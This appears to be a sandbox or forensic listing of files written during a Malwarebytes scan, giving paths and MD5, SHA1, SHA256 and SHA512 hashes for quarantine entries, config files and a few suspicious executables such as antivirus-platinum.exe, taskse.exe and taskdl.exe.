SHA256 4f6d73eec448acf83e5c66d8d97f4e82795a413573dcfc2b1f04ef8e230daada
SHA512 2fddae87f9c65ad9a1c8145afa0c812253d041af3b1df5e23835b0eac0b46d733700add830f16ab04aa7a6dc3729b0d146a76c0fe3e52d3a684402ba2c6c0449

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da59228a-ea35-11ee-b7ff-62d9003ae027.data

MD5 ccff793dc7d77c853e3a86629b584440
SHA1 a094f56f1150267c8c5783bcf2349961319af658
SHA256 49fc9b19c2ed45705e8c515db7c60f93f619facdac90963ecec457505f4f116c
SHA512 337925b879db8879062c4fd036ed9541f56051793409e27c52be57f11b9093b55e2ae6c014f4ad885b711a848af7f312cd352d4207b09bcd0cceb6cde9252299

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da5e2c26-ea35-11ee-9044-62d9003ae027.data

MD5 32133547c21aa4f3d0e4b7dbc30240e6
SHA1 c14988317fdd8fd478e822be56d5645b0580583d
SHA256 bbf3ad61b934f6d81f86c426d2dadc3f93aa897518ef91da97947e48f1f8d7bd
SHA512 59b8b2bebc084ecddb69bea8bf51290fd2ba61063fdfb2212745f8b465355aabdae4c7819e15a854b9df126b0b216df46b42a8565b6b23c00b53aedb23585704

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da5e7ae6-ea35-11ee-b29d-62d9003ae027.data

MD5 0aaf0741a02c713a1a9c8534d2ed70ee
SHA1 d0d5eec055dee628ab505414e8e7685b9a24bf1d
SHA256 98ff0a87810a35569523ee40b1556eed1e03cf7ab223f07e20ba479a7bea24a1
SHA512 d1ea928e4e01deaf32a9e5f16ff64bb063b615c7748b0568a57fe7f22fd27958cf982638a105e56a797ac1b0e612193c176a56c9cccaf617fb4e94801d7e1197

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da62bfc0-ea35-11ee-89db-62d9003ae027.data

MD5 89a2bdec74535f094c1917c27125521b
SHA1 337bd518c7786c48ecddc7d83bae01f0f9218c87
SHA256 0cf2797c35ab1b136e378f512d1166c647bc4d437b4359c816a5d2cc02a300af
SHA512 d99b99290fa5f9d592921c097ec0667091edd776a2ceceefa9ef09794be9dc8a807bf4583bb0d08e7437b07057f3f7c61c8f5d47730c0fcd546beacffd3f8479

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da63352c-ea35-11ee-84b6-62d9003ae027.data

MD5 2de03336c6a5b02786c43a53884f87d5
SHA1 20dde969e9e0321be84f8c63f55fca48b68b2010
SHA256 64364ffbf0b43fc5a4dd36986dde77343e674a5ca9ebcb3541745532333d275c
SHA512 bebbb1abd5a95ef6c7f48d04883562d346c40a438664d676abd0dd30b8a4d7cf42d0e60eb17d318a0fdd9e6008b863e9979a0e5b0304fb973be136c4061d2d21

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da63aa02-ea35-11ee-a352-62d9003ae027.data

MD5 44bd28df70de38c8169d8cd383602c1b
SHA1 226f5217ddc2699a41ae6e7b8f30e5ddce2771aa
SHA256 f2e436c17b1cb4111b807f91975c5155e787587c86dfdb2fb5a617c15197ca56
SHA512 89028db8c3fb7e62318374203bc32eec534f7cb5901a530f01e892d28c239b4fb92d4a088efe4dc93b06d7184f23969f3cabfb5f1352863554772d3563efe5b0

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da64946c-ea35-11ee-8743-62d9003ae027.data

MD5 ccf415f8e387909f6520d954234fbe22
SHA1 4a98d9fe55cd5b8a9bbfcdf5a7fa745c4bbf323b
SHA256 1d49c5bac7a97dc3f400a06c0fe7817212d62759a46e6b7316b670613f077652
SHA512 dd03623fd0d9652836837189d83772478e0c7504da06bfcb0f2ec2f066a21929be5319c83255ace6faa0097d780b96de850e4707865914721c3c23c0eba64295

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da64e26e-ea35-11ee-9a01-62d9003ae027.data

MD5 41b02c534fa6a4063a326e719c0f7186
SHA1 5ad54bb5d103d00ff2331fad51a0d328f659f2c4
SHA256 58455f1e6deb04a9752a08e2ed5d86287e81496d54adc7bb723a86e7ca9e31c9
SHA512 26e2e0e6cfefb7821a81ab7cdcb33fecdb9fd1e6b286f963b53b600ead4b3e4b7895250878acb04cf37e57488f5fdc6aea42328db781f8ec23bb29be1bf94638

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da6530ac-ea35-11ee-b1a9-62d9003ae027.data

MD5 e45aa5fafd95700b7ffd25841e580b9e
SHA1 6700f7e976c0157e1998bd4858bc2ccd813a89d2
SHA256 4356d10b13a68465045e7a008039337be80ba22821b142bddae53d17d7c2657e
SHA512 0f1fff94f066ae19a82d748f4a0511872b67dd6a59271ec5fc928fc13b2181a0c8e19f31935bca3cd9ec42e4420689e9e771df9a678f892425dc088dd4ccd722

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da6f4aa6-ea35-11ee-ba6d-62d9003ae027.data

MD5 5b4bb1b36b7978f97d254d2960289b7e
SHA1 f245e740e3b97bbbd4303db9515682d25e7545c7
SHA256 5d927042812ad156d77cb9e7bb7dca253de18e0c64abc90887cf50728f7b4fa1
SHA512 ded7cbe9fb1fd0120e00aeb846829a18b06a0e174ccbb4850d766aeb470f18492ff35e3aa8fbe83ff02a225d6667f7b0d86b37717da6b7e6a40e29af0316371c

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da93ecbc-ea35-11ee-9353-62d9003ae027.data

MD5 ee882a4e9e3cabf2072ffa8b585fbcd2
SHA1 6ac076607378805d9d6fbb292f1a59f0471b4f4d
SHA256 353f64e4289fe3269fbe5275c73518eeb3009b331afb686eedace414187cb8dc
SHA512 8bb266722ef5940cb47d50b30ef3a0fd13ba4523c604aedfc5a925d052051630187f4bd0e896c557c9536960b4b26f5251f141cae7d0faf9c492510407bea9c2

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dabc5148-ea35-11ee-ba19-62d9003ae027.data

MD5 dad99738d43475d21d1a07104a1d2dbf
SHA1 bd04a988e199778bc4b79beff3275e7cdcc8b80d
SHA256 010afa006ed5c07616c24f40b3e960c70631212ad1cefd8f7159d6acd2f325cc
SHA512 6dbdfb8910fd694ff610d5d358efd21652cd720dce890296fe24d7e2878f32f0ecee6adda27f303731a3c05f61db08c1b41f0ff57caa524e0194c7df67892203

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dabfac9e-ea35-11ee-860d-62d9003ae027.data

MD5 a313fa9ac33766c795e0297bc7739fc4
SHA1 c5d1388262409ac5aedcf6b87324b27ba16b0994
SHA256 5521611b459a3a8e3191790ab8649c28ddc372262b5dfa49360d6c4a6bb04a72
SHA512 e0b91fb034399822c43f90d46856bed50bb7e1a8048a262b33143a1d71e533cacddb39b0c17003b353442cdd2991f75ec4bc360db7dfc292922a6612f745b09a

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dac307fe-ea35-11ee-9fec-62d9003ae027.data

MD5 6e922cc985e06cfb47f4216f732d6b6a
SHA1 6b2ca5d31b45eb3373a5c159254523570e18a402
SHA256 f936198a3c4e19ab1b7ff7522455e2468455c73b605c3f8243dc5a8e41d95e60
SHA512 2186e2a99edb1d2795eeb84c2dd858e04eb77ed35cc1ceeffbdae73a60e1e597109307dc2121a2dc0db4bd03052ae097f9bba38472c8eb984a50124789d27bd2

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dac307ff-ea35-11ee-938f-62d9003ae027.data

MD5 906c4711b03e79717cad34e62a49a714
SHA1 a89c17fdd43ff8bf445dda222ce622225e5fe47a
SHA256 54fd761ee092f89e0f28a85be59b7b6bd0733d931da75134529382c815495b7c
SHA512 5bde917e335cbeadcf4c81ee883e2a494be9c4db5ea0e53512c1f35464dda31eb0622fea37a02a121b59ad11b664e254f53172551502dfe45a779072f53bb710

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\daf64d3a-ea35-11ee-b74b-62d9003ae027.data

MD5 caf45e8a907ffcac307ded0e42437523
SHA1 54b096fd54c7088fccecd1576d8ac33b10b306a1
SHA256 c58d3afda21a6b306ae7db3dde631eb6ddf95aa036f135eca5debb3abf67ef60
SHA512 3de9f615ab5503fc37c791b24de1b8a4e1baa5ad1779598b24b3727d9390960d3afb96484a037d39511feee8eff60d6ee202343052ff99cb2f9998f5830ae79c

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\db176934-ea35-11ee-975c-62d9003ae027.data

MD5 73677b886169d91d62c37efa854348bd
SHA1 12671141333ba83572d501722916cf8930d14e18
SHA256 b454fc9c040b1b8432fc04c0ffd6f017a03caf9071fd7359694c76f252758758
SHA512 f10c93198576bb9053c49dcbbb4384736c58f513cb084241463159c18696d8d6b9a6cadd51d39e1adeb14f4df8c608321b4b2079632f0641de4db5e967712f0b

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dc603d48-ea35-11ee-aab8-62d9003ae027.data

MD5 d69f471fae0407cdb21bea59849d8484
SHA1 693d9579a33dae21bd43e85e413a1107e38a5ae9
SHA256 a94bb4306c39da397c00b725096c95cf51ef872ca0525c2f1a37df573f00b5ee
SHA512 21cd31b87a4550c48842b8701668dd92e9f400f37849e00d6ecc7bb77a37eed20ada469fb1448bf1e7a0f2ad590eb564f2067d981a68f4702bc8b968af5e8e51

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dcec9eaa-ea35-11ee-a09a-62d9003ae027.data

MD5 e39e58582dd5c1414ba50c3c875779a1
SHA1 364f143c8b17ab7a9a398bcb42c457f5a08fa772
SHA256 80b26b20470c305c65951b018eb4d25c894ed00caa80203a9a547283f3b217cb
SHA512 3e4e6b2abe8fde4abd5deef1aad8a987d03cb5421de6e46a8e4b752b3c085848cf9a5033425b41b3fe5ba86ee11baa023b1a8a767ef79f6159da561670b6db10

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dde27046-ea35-11ee-a6ea-62d9003ae027.data

MD5 d79764c4d4ac00d00ffc6a98cbe6187a
SHA1 a2f713a5fbbf5233a2f540622108a92d9e0057f2
SHA256 ef047ebdc6136a4c270c30d194a04afdb58becf8cfbef35bea2c99b62597553b
SHA512 4a72eb615e5c98a6485e52ef52afdbed1b2e74046ca452d03561bf1d09bd201d0ef1942ffb54ff4409822d143767a29969b212e3136d34309150b1cd9e38a6cf

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\de74c518-ea35-11ee-90bc-62d9003ae027.data

MD5 ccc02e72247f49e9be3799fdad7e6f9b
SHA1 474e0b164fd65e8637a78e1bc8fe049ba0295fcb
SHA256 f09eca7fc25517cf9222d46ee1c240ebab5e3f29f6228aef78b62ee5389289cd
SHA512 6271816ef2d36f4cdf5e58790019248eb2d449bbd8c70d72e7277d38f0ec0dd183cdfc6b94dcb8fa4f33768d7812588b94716782c30620b41effc86875656927

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\de7737e4-ea35-11ee-b79c-62d9003ae027.data

MD5 d9e89fef5e55eea97408f97752dcf938
SHA1 a3cec957bc7838329ca87eae621d0ea5209a7cb5
SHA256 a163ca3049a6fa9a1b92c8434388527fd37c86fde2444ac23bf1ca49a84f59b5
SHA512 29ef57a2b2a8e36c586b680f11b5bda57cdd5b6e680239e7c89717a36943986ec64fdecddb24033b9c2ad73c85b4fae31fbf5b69dec86c1447285fa696e1021a

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dedab3be-ea35-11ee-b518-62d9003ae027.data

MD5 db8402e67da66dcd3a2bfd045a061d52
SHA1 58d41bff3a513dfb1de5ca5f400303b57257b4af
SHA256 bd65d54ecba1ed624e919623c2d65a17bbb6d274b68d898ad01f148cf93d975f
SHA512 96776a6f350994182bb7bb801868e7173a9df747e6deb9b533f0be161215115aeef2be437dc7ca1da1526cc673beaef54c4259bade1e2149e565a4e4be87bf81

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\df5ae05c-ea35-11ee-a172-62d9003ae027.data

MD5 97ed0523e3c91992cce61eced24254f1
SHA1 edbe7ea1a025a756a5841002d1f6131140474e66
SHA256 d403f72d6ae90302f10086998f18183523e3fa3d31de696cb937f387a75ea9f9
SHA512 87d4be343538bb872260e51bef6ae05720ff57553e5e41082e4c41c6072a61e70c99f15e66da46447557f316b81da7cb1e397126ef2805315e214bc6b03b8082

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dfcf0702-ea35-11ee-842a-62d9003ae027.data

MD5 6ce3d5f29bdca628e7e880db2c9e6bd4
SHA1 65ea500f572feda4fc050648bbbf58ac18fd4115
SHA256 cec07981fb29b34436dd732d86cb45f5f1a93eef68e4bb39a3a983ea49b90898
SHA512 ddcda95a46630c3acef80fd0c3536401dac88f5cac6a564462c6d9752b6e29ee3c38d1fdfececfc62d331232079a01af9dea4fa56d7bc9e5eb289de7a04c7055

C:\ProgramData\Malwarebytes\MBAMService\config\UI_ApplicationSettings.json

MD5 330dce881a9f6b18619c4dafdff3b50b
SHA1 30b47bb0def7dee96b97f052a077f88091e7fefd
SHA256 eabb46a28ab331d49059fa68a7ca9dafa3455bfbeae217db8eedefae1e8ec3b0
SHA512 415fa2036eb63e8e1e506b8d9949ca80fa1891252817c79060d0cd2bfebc6a73b79e10e0d1c4da500932454e9f0eb9cbe5098017a71d8fd066771c74c3b8a1f3

C:\ProgramData\Malwarebytes\MBAMService\config\UI_SecurityAdvisorSettings.json

MD5 eccc5d868618dd0bdc6f7e1f2154fb03
SHA1 40404e686399cca2632a6990c3e5005980bdffa1
SHA256 ed11c69010982572072f5d37d9eb6d7ebc814b9999154f7005efef47b56a5089
SHA512 a3bd3d246fcb9449715ef24b6142035ca8b71bafb2e6e24fc3b3fbbb45325ac391159efbfbe1e5ac8e2c388812349a735d40fc8f893c26b95c5ef327df3bbdfa

C:\ProgramData\Malwarebytes\MBAMService\config\UI_DCountInfo.json

MD5 50305e183fb3b156682d4a4c01e1fd80
SHA1 9ff2e7eafc667e98dc331f07a9fc81215d149072
SHA256 42ea6695369aafc8497e55c4dc2629be35d20da2cb3c397aa76ccd5aebce6a5a
SHA512 0ba73a9accf0282f8573ca6d8ea33f14caef3e3ac27886ff7871cd6d70dcb635a0f3f55cbb5ebe409e9dfa6a58062d4f1980315b95d1ffe584eb1a0a53ef4532

C:\ProgramData\Malwarebytes\MBAMService\config\UI_NotificationsSettings.json

MD5 a09d48816f716e829b996aa3923f3c4a
SHA1 475936242c11115607919072fd35b352ab6b59bd
SHA256 b4a970db14441050499290fc276d11c371c59526eb604384d0d17cdc8828ca74
SHA512 52a28e597f0bb5880abf060102f4fefe180b521e32ccee141df522a1de946738d451f4f24def827f02775d7223845401abf9cba3171fd027e43cb037ddb2fc68

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 e3453a427627455dd9912352749c1e3d
SHA1 c65ea23acefecd59ec67c4dd07bd776ddacb5985
SHA256 1276a8c9a4cc327e2ca1261b5cc2360e3941eacb79b4fe0093d50298c43aeba4
SHA512 cbce41bc6e79ff5ce8ee9abf2efd021b146eddab449a2e6ce75c818b4737e943f874e82aba4eb14517feb354a265228612afb7a6c9571843421489eae9a41ccc

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\ProgramData\Malwarebytes\MBAMService\config\UI_IrisSettings.json

MD5 254936d51f6b07f3af2a9d1be2e4ff28
SHA1 7bdfed95a78bd27614d9dc49be91934bb210e26e
SHA256 57df1378d3981b649b373a585042be4b39c20216ca4ab7412c2360ee50b89409
SHA512 4deac3dac0912691dffc293321deb4b6d063c83efb5947b4d81e4d558c62fb977e3fbe5b50f3a58fe3223b4511568d81cfe744610270d8d297b4249b1235fad3

C:\ProgramData\Malwarebytes\MBAMService\ScanResults\b8d8525c-ea35-11ee-b51c-62d9003ae027.json

MD5 6e887d0aa80e02734b0f1fbb58223ffb
SHA1 24086fb1ea79fe7425f7c29864d0dc13fb3566fc
SHA256 5a4cf49b59cd322188cc85d97d08350028a6e13bd767c39203c1cd644c4974fd
SHA512 74cd632c538f6d183c7a85487346798d82fb12fc387555b59a022fd970acd5f4586c42f24f5c1525a7dd1def9a959f4c3ffba48290d90a7e5a1791363a191f85

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 04a6ad177856e58529e3cb3e0c0b9f3e
SHA1 90e4834c4b54f6287938ead77517157a878bee50
SHA256 041eff2420987a6acba22f26eb277a3a1a3dc455f944750b86a3b5ba6f1feae3
SHA512 adf39ef0e5435878c4d12db5ca3a15c3fa920792fc8dcbc9bc99f032322bffec71ee05a536c709bfbc345badfa60652211af6c9bbdfe7cc74af85299613a3dcb

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\9e4a56a2-ea34-11ee-a052-62d9003ae027.quar

MD5 e14052f4153ee3f28f703c3d51f0f273
SHA1 8eece57712a4482f92065ba2e2cdbd8b8f0018bc
SHA256 79dfbc7ccd4e1736571d3575a80cba5d28e0bbb0521106c1d936a76c142da45d
SHA512 8ac8b58ceec4f9485290920f25217d047be43957454863ccbf65f873b8e07c29d98dd2e7e6794f0349b351d73ac8fbeb6f25050d0400a32289a34ea176f6306b

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 7c190ff403772f5b531d3bc2f684e937
SHA1 057fb55273f50b4c35514915b44156cc2ad09f92
SHA256 b8e1ebc291d4d5c649208e853384f782dec16abe23bba662ddc1a665c76c17ef
SHA512 b06300d2520bdae3cc798da7e9c99d759e9c83d95d8dda4d02f89eab5f9c734b4dbab3743b968863aa9e3360e2962c83440ebb1c81f4479300fbb812dd6620bb

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 a772aabeb4abe46cd675944fae7f4bab
SHA1 13db034e95bb79d11a278a4e5af8fd12ad1f024c
SHA256 a10848616b28755a8027cee3b77d66ab9f24a70a933372d67737e0cb700278b8
SHA512 3a5737c74441e92496e0a6214cfa5fd90e21f0e5b466cfdd8193327ac2f5e1863a90a569f37860d553902145be2d5840778e9220f91112166ef3ebfba14571eb

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 2fe78eb7134a70b7f1a9e2a7a056b1b4
SHA1 f12debe73d1c48261c0dcea0f0276fe2b5e8a793
SHA256 48cf8da1becadf77261b4e82a28119ba83b1788bb0e275527b04213472a8a768
SHA512 2168089e6c3206ac7cc3520b972c0c004b499011c39a02a571165847d07ae52e49742fd079e085b2f77dac7706b35eb9e42555a2b8bb064f3147585687eca462

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 d4a1124ea249a1f922a437e8dff1344b
SHA1 8e67583550c0af20bc0813fa4b825935114fa6e2
SHA256 03ca14b4470688330be5e9a9654262535f3b615679d8fee24b31ace0ff1fe793
SHA512 9fc342ec1f4a54ad85ca0b77d014c22aa830d4608844c6cd3691738ff8730975ff442778ec4c78c088498ab4421af17dd8c464b1e48d93aea1e0eaf13b6f9cce

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\9f9f3856-ea34-11ee-a002-62d9003ae027.quar

MD5 7b1a17bd3bdc727966d34f64463fe576
SHA1 d1551b92f87fdef307579c91f137124340e5ddbf
SHA256 54b12e1d8a6cef13681c98048ace19d78a1a7857cc4cb59c0bc3c7cdad69b77b
SHA512 3cb1dd7020c0662ff7f31094f2118c4acb2956d6acea9ec10e044d1ad7266388788d6ffd30094b554cc497f945a6be06220346b380c35ec8a9898de114cb903f

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 221d66c289481bd5e6d8751ea97c48d8
SHA1 ef3b66a9bea9ed47a2d5e5371a25920b9d406e4e
SHA256 7ac153f085a8ce4f7d96f527cf5cbfa9bdd95fc1e5f4e91591b21a36ee2751bb
SHA512 81abd1ffc8a74aef44f1b173c4031b5aa9650bb966953ce7a79523dcde7090991342d3aa26d45cd414d6a32ad8494d1ff615e86335c300ee66a159a47951a47a

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 f0c0526c1c0d3c63621f67730d2acd2a
SHA1 c1a2c5dd6cc873ef427a5ea8df2f70b022a9bc6f
SHA256 b64a671c7ae2fae6048001c5fd7ff1e498e9eb4dc376b47e92f79dfa3ec454e1
SHA512 f52b47365854c845af606262df02b88d900e0e9b389b74da8107fab4cd6dcd6d42d2990aec2a391dd76d3fd58de2763bb066c46e00667a120866bf0b134f6f50

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 ac8cf7137702c115c122f5d89e81177d
SHA1 a2e1123ba7f648de92d4e46a8114ffff36e40081
SHA256 ce260d9571cbebf3da7928f30362bee4670c13118ed8029744f533dc927d2e3c
SHA512 d459367810ab8399e63dbd57c14f950a32fb315e36938655ce7cf4b5ee90e65a8a27affcfd69fdb12f138278a30d229a13241ce58267544eed5e48dda21b6970

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 5c5b713422e3505abac890ea49ed7d7e
SHA1 ae438246285d53f131354a89b159b9d532609975
SHA256 f270584891d3030c1cff86fbd9cbf9f8c49ecd10d331ceea5b623427e131b6dc
SHA512 2d5c898249b599b36247d74004224799d4bf444af8e192b743f397ed83adcdfc4ccd7ec280bd86583a6b8ee6bdb06699e3add27777d1621f5fc2b164ad923676

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 89ba43251217f12bd468aebc4984d773
SHA1 05ee3a403fd0a141898cbc95da1bf7b43175ce8f
SHA256 3d483a7089eaa46059f6e568eb2f8b3fba90e235f6585245809bd792aefd3ce6
SHA512 85d5b3abc2b9f6eec5ca079f1fd13095ec5b98e4dc3187cc6c8e699dd9c80500b2c62147e16703e29fa261f7131f5a37c6062de33e381599f27b3865ee8bab8d

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 d0e55e4dcfa48e8159a561da0daf163e
SHA1 2f470647b527c553cdaaddbb9593e5f7348f2524
SHA256 29c720906715bf07a0d63e2030c6fb654206cdf8df230548bf5ae87f618a3001
SHA512 783d673b3d84cf2909ca85f95b6c0a94f344067bbf410788070751642863872595b411f3a867a33c6e729ec436524d6256a0523ded18416846be2de35107af0f

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\aba2ef76-ea34-11ee-8cbd-62d9003ae027.quar

MD5 59af7a1cc7543e0f26a0ed6ffae67f1b
SHA1 31d81636c62225a44e105eda3bc95cf20c64e17e
SHA256 d2edc96f39128fd278df7de0240d07eccfca00fb0d9e6d84331f22fa96c63026
SHA512 c65338a3da3b08631559e20db6ecafa947ed6696e6209f50b95d353a5361d031b37278818b42b8efe17ed39cbf218101f81df0ca173d0797c67828bb985ec5af

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 cb0f5dffd60b60477ea7d5089f7eef81
SHA1 f23c058b5ce501a52b462756f3b9ec448d0b4fc6
SHA256 9b295c000ffcf67875c9c8141194b3725c00301b0ad04344e0789c6f817d8bd0
SHA512 78ae95af42faff02d55c20e6b96acb2099f8801864ec2ca1015ecf85f378605e8f409b37add7b9d2c74fb7bea2d8330f0dcb99e3da0aaa3fa3cb1ef7242ea465

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 8d7f65f91f36978063caf504e025e233
SHA1 901b4e2dbf27de2f5f5b09d2915ed5aa4aaf8f76
SHA256 2094f84cafc38fd1ded828efac6cf894facce0c142d6b448c32d7dbe9e06ab59
SHA512 a671c36adab2af1a19e6b98ab76636f9575e1c4c6311ca3d78521a0f6e07643767560233ab20c5e5adac046d7f81397281decc26f9dbbecabea112952d9284c9

C:\Windows\antivirus-platinum.exe

MD5 cd1800322ccfc425014a8394b01a4b3d
SHA1 171073975effde1c712dfd86309457fd457aed33
SHA256 8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0
SHA512 92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 66cea6b34acd1ddee5d37cfbcd458088
SHA1 4744625b612d8d72383feee686ffc8c9198a3a56
SHA256 bd58ea3a499a48f6298156c3c2fa290e87a5d4dfcbe8239dc4b5d74ddfa01522
SHA512 f3feb66ad87471b7aef7ca8292476c4727f56bf6fde247f8a08e26eae3a3d38df91b6843ebafe00c458a71d2adad9362d041a78abb634f4587e0b0f8e5675a31

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 f5c7106c680af615a89e7a4896172715
SHA1 b595fe93aa0e4b22e5ccc70e583142313c244fb0
SHA256 f730da03de15e9be03a3a7576837712ac1e45f33eebfc4cf0d3dee558eb50e28
SHA512 06b24f7d314685c0db00a500c6fd965b9938b0ff4c6dce80fff835c6aa032d6c2cd31e579cb3e114eafc1201fceaceedbeead30f54f27328a645041270597e20

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 5c17976c7820655e52e6d20862b417de
SHA1 7ccd6bb7c644c20cf1eac478bb7cefae5c9c0e5c
SHA256 2dd7da932c3d05ce2a052ce62d8e760cb1bc01b1f2556c8735e6a697df2265b7
SHA512 eba2b28a93a368bd1a9164cfbeaf654fd1803eac09427f298a7d97d6c8e6af4d5c22464a6370d5bbfb2714ed0fa34d2bdd235042de3ab91f0a058fcdb4296303

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\d9f0008e-ea35-11ee-81f6-62d9003ae027.quar

MD5 2d37054b8929c37a0c985c8dffbdcce8
SHA1 3a272f05d36ec749aa9b25e23c43c2efbee995ca
SHA256 ce7dad6645f2c3c25df0da6d12557f2c507e2d1f773ee0fd67d65ac990015137
SHA512 dad371acbc9f2c3eded1bce51bb763a956e90d12afc1e73e0f0db7716b2cc64a9f238cf6ab60ad943190743f4801e3acdf1057891be9e46a69bac7e164390518

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 0994a62592ae777a5ff09ccd1478c723
SHA1 53d5ccdd9f3645f85ccd1a6da9dc26fc89ba9557
SHA256 ea75756635e6444649e1a1e4df25d6c9ee5a01671aa76c5ee5f6745cacb10d6e
SHA512 4c495a9f85b622a0db4ee9253371c384df65f7b9ddbc88093ecb9078047225f7490ffb12beca9d69310008c2dab8f96a17e063ef9c1a64a2ae7a27a7d83e1af3

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 89456884c1340c9f194075070cdd35e5
SHA1 22ce9bbf9dc4fdb4421554d733f6ac4e74aa7f6d
SHA256 ff9b4aa56bb666d68dae6fb6a05e2fe87bcfb99e0e4d63bde8b9ca7ada784032
SHA512 3b90b035226242cd8a1f8a7adc7c069c404fa73de90660bf20741bf705c1e80f8ec4fecff77002051b4c5b7df6b45c00b881a5c9270795d15c70458cf3e53957

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 4b92aa40b204c839b051e057cabb6479
SHA1 07470d28f88ef04e06a6fd36e336b62aabee41c0
SHA256 810077f151544ed2e55cd5e9f9ac68f067e52b8baf4d84b0d085d3460b288709
SHA512 8445ead874ebc92870984f32efb8c72f16fd683b1a49859c41880077c6632cd5dd33cb43f7fb2f384808837fd251fa673a9d10352e871870cf765bd298be3106

C:\Users\Admin\Downloads\taskse.exe

MD5 8495400f199ac77853c53b5a3f278f3e
SHA1 be5d6279874da315e3080b06083757aad9b32c23
SHA256 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
SHA512 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 3273a9e9452ef2e9c192a1fe98ab0df3
SHA1 f0df04328e53bdf91d9388a445d60f4d2c8fa71f
SHA256 c1bddc6c7dbbe3c3bea1a1e65f46634f9f4e4ef07228367ace9dfe23e818c015
SHA512 76f3539d659b01619f5094f1dda2dede56664d8ce238aa716b599adfca775f95bc09b364318bba3a2eb948f5f3d660e5e89168f2f3e67f3bf21024e9d5b2a169

C:\Users\Admin\Downloads\taskdl.exe

MD5 4fef5e34143e646dbf9907c4374276f5
SHA1 47a9ad4125b6bd7c55e4e7da251e23f089407b8f
SHA256 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
SHA512 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 2247e009e3a1899aea40be89bf483df4
SHA1 45b58841288956b3e1247bd1b78b4506c143dc12
SHA256 cb4f64b8e2e931b3e1227d2487828ebe564ab8152bbdc2cecf5e4a0956686e68
SHA512 921289bc93eeb9f06615fd123ebacca5f12ed5b3e1217e36190d9558be3971db0c1afd7f3f604c4fc2e9bd49d9fc775a11b01c50aecda0c42328b7a94c4e32bd

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 72f371f603689fc51d6fd7cb47e06422
SHA1 60a42f66af5298c40a362cc10a53e7b0bfb61019
SHA256 4e5318ba6aa31ab7a244d69ea6b59e8e184f4c0365d2798b117d7886cfa74df2
